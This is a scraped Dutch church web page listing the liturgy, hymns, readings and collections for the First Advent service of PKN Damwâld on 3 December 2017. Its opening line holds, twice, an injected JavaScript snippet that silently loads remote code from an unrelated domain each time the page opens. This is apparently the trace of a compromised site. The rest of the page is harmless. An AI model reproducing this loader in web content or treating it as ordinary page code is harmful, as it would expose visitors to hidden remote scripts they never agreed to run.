;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 3 december 2017 9:30 uur - PKN Damwâld
zondag 3 december 2017
09:30 uur
Koffie na de dienst / Start KingKids-kerstproject

Kerkdienst zondag 3 december 2017 9:30 uur

Thema: Eerste Advent

Informatie

Voorganger:Dhr. T.R.A. Simonides, Burdaard
Organist:Nienke van der Heide-Visser
Thema:Eerste Advent
Mededeling:Koffie na de dienst / Start KingKids-kerstproject
Liturgie
Lied voor de dienst Gezang : 465 : 1 en 5
Welkom en mededelingen
Aanvangslied Elb 37 : 1 en 8
Stilgebed , Votum en Groet
Aansteken adventskaars
De eerste adventskaars wordt aangestoken en een van de kinderen spreekt een gedichtje
We zingen: gezang 118 : 1 en 2
Gebed Gebed om een zegen en om verlichting door de Heilige Geest
Adventsproject King Kids
De leiding van de zondagsschool vertelt in het kader van het kerstproject een bijbelverhaal n.a.v. Jona 1 : ‘Begrijp je Gods liefde?”
We zingen: Projectlied
Eerste schriftlezing Psalm 139 : 1- 12 en 23-24
We zingen: psalm 139 : 1 en 2
Tweede lezing Jesaja 9 : 1- 6
We zingen: gezang 127 : 1 en 2
Overdenking .
We zingen: gezang 127 : 3 en 6
geloofsbelijdenis .
We zingen: gezang 474 : 1
Dankzegging en gebeden
Collecte
Slotlied gezang 308
Zegen
Koffie, Thee en fris in het Skûlplak , wees welkom !
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Heifer Nederland

Heifer Nederland is een zelfstandige ontwikkelingsorganisatie. Heifer maakt deel uit van het Heifer International netwerk, dat al in 1944 is gestart met de bestrijding van honger en armoede door het plaatsen van jonge koeien (heifers in het Engels). In 1999 is Heifer Nederland opgericht. Bijna 800 miljoen mensen zijn ondervoed. De meesten wonen op het platteland. Landbouw is vaak hun enige mogelijkheid om een beter bestaan op te bouwen. Heifer is er van overtuigd dat Afrikaanse boerengezinnen met de juiste kennis en middelen zelf in staat zijn om voldoende voedsel te produceren en een inkomen te genereren. Dat is waar Heifer voor gaat.

Tweede collecte: Kerk
Uitganscollecte: Kerk